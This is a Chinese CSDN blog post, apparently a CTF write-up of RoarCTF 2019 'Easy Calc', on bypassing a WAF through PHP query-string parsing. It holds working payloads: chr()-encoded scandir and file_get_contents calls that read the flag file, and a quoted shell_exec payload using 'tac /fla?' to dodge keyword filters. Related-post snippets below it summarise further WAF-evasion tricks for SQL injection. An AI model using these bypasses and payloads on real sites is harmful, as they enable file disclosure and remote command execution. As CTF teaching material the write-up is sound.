利用PHP的字符串解析特性绕过Waf

已于 2024-04-27 17:03:40 修改
阅读量174 收藏 3
点赞数 1
文章标签: php 开发语言
于 2024-03-28 23:06:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BoJing6/article/details/137123559
版权

我们以[RoarCTF 2019]Easy Calc 1来进行讲解

尝试访问calc.php得到源码如下

尝试给num传参:发现只能传数字 而不能传字母。而我们要读取的可能就是flag这个文件

那我们可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格

绕过num传参后,我们要读取他根目录下的文件。

也就是

/calc.php?%20num=var_dump(scandir('/'))

却发现他没有返回我们想要的答案,看源码发现‘ ’引号被过滤掉了,那就用chr()绕过,chr(47)就是斜杠/     

/calc.php?%20num=var_dump(scandir(chr(47)))

输入后 可以浏览根目录下的文件,而其中的falgg就是我们要读取的文件

? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

  下面是某位up对这个题目的理解                         
                     

这个题传e_v.a.l的时候一直传不了,才知道是个坑,利用php字符串解析特性

由于 e_v.a.l 正常POST的时候 "."会被解析为" _ "
找了好多资料最终发现 可以用这种方式绕过:
第一个" _ "我们用"[" 然后后面的"."照写
当用"["来解析为" _ "后 后面的"."是不会被转成"_"的

然后playload如下:

password=114514&e[v.a.l=echo(shell_exec('tac /fla?'));

我的绕过参考这篇文章,用shell_exec绕过system,用tac绕过cat,用fla?绕过flag

命令执行绕过WAF总结,RCE常见的Bypass思路 - FreeBuf网络安全行业门户


                        
原文链接:https://blog.csdn.net/snowlyzz/article/details/123459590

BoJing6
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
中间件特性绕过waf1
08-03
中间件特性绕过 waf首先通过-1 /1 /0 运算判断出存在数字型 sql 注入一般来说 asp 都是用 access,这里使用--%0a 的方式来构造 pa
分块绕过WAF.zip
02-27
这是一个绕过WAF的方法,大家能够学习到如何绕过的方法。能够提升自己的技术水品。
PHP字符串解析特性绕过WAF
十一.的博客
12-21 237
测试发现当我们提交一些字符时,会直接403。403?!应该就是走私报错了,经测试发现的确存在服务器存在http走私漏洞,可以用来绕waf
使用PHP查询字符串可以绕过waf吗?
yihuliunian的博客
06-16 181
转载自品略图书馆http://www.pinlue.com/article/2020/06/1515/0310739850631.html 使用PHP查询字符串绕过waf No.1 语法&定义&注释 查询字符串解析到变量,首先看一下parse_str()函数:语法:parse_str(string,array) 定义和用法: parse_str() 函数把查询字符串解析到变量中。注释: 如果未设置 array 参数,则由该函数设置的变量将覆盖已存在的同名变量。注释: ..
php string ctf,PHP字符解析特性WAF【buuctf题 easy calc】
weixin_39939601的博客
03-11 296
一、PHP字符串解析特性PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会:1.删除空白符2.将某些字符转换为下划线(包括空格)例如,/?%20news[id%00=42会转换为Array([news_id] => 42),然后参数%20news[id%00的值将存储到$_GET["news_id"]中。(URL编码%20是空格,%00是0)例如:User inputDec...
利用PHP字符串解析特性Bypass
bylfsj的博客
10-27 864
我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => ...
使用PHP查询字符串绕过waf
hdxx2022的博客
11-04 390
20wenson[id%00=42"+AND+1=0—在PHP中,上面的示例%20wenson[id%00]中的参数名的值将存储为$_GET["wenson_id"]。在这里可以用foo_bar的值进行fuzz测试,“[X]foo[X]bar[X]”是[X]的标记位,对这个标记位进行测试,如果web服务器接受带点或空白的标题名称,也会发生类似的事情。最后,文章的内容部分参考互联网的文章来写,在绕过的过程中,多尝试一下PHP替代函数进行绕waf。parse_str() 函数把查询字符串解析到变量中。
PHP字符串解析特性 ($GET/$POST参数绕过)(含例题 buuctf easycalc)
bin789456的博客
09-20 2259
了解一下 PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事: 1)删除空白符 2)将某些字符转换为下划线(包括空格) 例如: 下面这个图就是测试出来在能够哪些地方添加并得到特殊处理。 通过以上特性,当waf限制get参数类型或者长度等等,我们就可以很轻松的绕过。 参考链接:https://www.freebuf.com/articles/web/213359.html 例题 buuctf-easycalc 打开题目,查看源代码 提示中显示有WAF,同时有一个检验函数,有一个
php 字符查询_使用PHP查询字符串绕过waf
weixin_31308407的博客
03-09 165
声明由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。No.1语法&定义&注释查询字符串解析到变量,首先看一下pars...
一天一道CTF 第十天 (PHP字符串解析特性绕过
scrawman的博客
03-15 362
前面几天因为做战队大佬出的题耽误了,今天开始继续 [RoarCTF 2019]Easy Calc 直接查看源码发现有一个calc.php文件,URL后面加/calc.php直接就进去了 那么在这里我们就可以传递num参数,这里有两个难点:一个是WAF只允许num传入数字,另一个是preg_match过滤了很多字符。 前一个我们可以在num前面加空格绕过,应用的是PHP字符串解析特性waf会将" num"和"num"识别为两个不同的变量,但是PHP解析字符串的时候会将空格自动去掉。 所以最后的pay
mysql绕过waf_SQL注入中的WAF绕过技术
weixin_33435461的博客
02-19 421
1.大小写绕过这个大家都很熟悉,对于一些太垃圾的WAF效果显著,比如拦截了union,那就使用Union UnIoN等等绕过。2.简单编码绕过比如WAF检测关键字,那么我们让他检测不到就可以了。比如检测union,那么我们就用%55也就是U的16进制编码来代替U,union写成 %55nION,结合大小写也可以绕过一些WAF,你可以随意替换一个或几个都可以。也还有大家在Mysql注入中比如表名或是...
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
那些年我们绕过WAF
05-07
标题中的“那些年我们绕过WAF”暗示了本文将探讨如何在面对Web应用程序防火墙(WAF)时,采用各种技巧和方法来规避其安全防护。WAF是一种专门用于保护Web应用程序免受常见攻击(如SQL注入、跨站脚本攻击等)的设备...
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
Laravel Excel导出功能:高效实现数据导出
liuxin33445566的博客
07-08 1170
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
数据结构第14节 加权图
hummhumm的专栏
07-07 1341
( V ) 是顶点的集合。( E ) 是边的集合,每条边连接 ( V ) 中的一对顶点。( W ) 是一个函数,将每条边映射到一个实数上,即 ( W: E \rightarrow \mathbb{R} )。
三级_网络技术_14_局域网技术基础及应用
最新发布
2301_80961833的博客
07-12 163
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 247
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
sqlmapapi绕过waf
09-04
绕过WAF使用sqlmapapi,有几种方法可以尝试。首先,可以利用MySQL的版本号注释功能绕过WAF,这是一种常见的绕过方法。此外,还可以使用一些其他技巧,比如使用0xA0代替空格、利用特殊用法如\N和.e浮点绕过WAF,以及使用&&代替and等关键字和大括号注释来绕过WAF。这些方法可以绕过一些WAF对SQL注入的过滤规则。 另外,还可以尝试利用HTTP协议的不同版本进行粘包来绕过某些WAF,因为一些WAF解析数据包时可能会出现问题。通过发送不同版本协议的粘包,可以绕过WAF的检测。 此外,还可以利用URL编码、charset编码、MIME编码等进行绕过WAF。这些编码技巧可以混淆注入语句,使其绕过WAF的过滤规则。 如果你想了解更多关于绕过WAF的方法,可以参考sqlmap的temper插件。该插件提供了更多关于数据库的绕过技巧,可以帮助你绕过WAF的防护机制。你可以在sqlmap的GitHub地址上找到这个插件。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [常见的WAF绕过方法](https://blog.csdn.net/wutianxu123/article/details/104260945)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值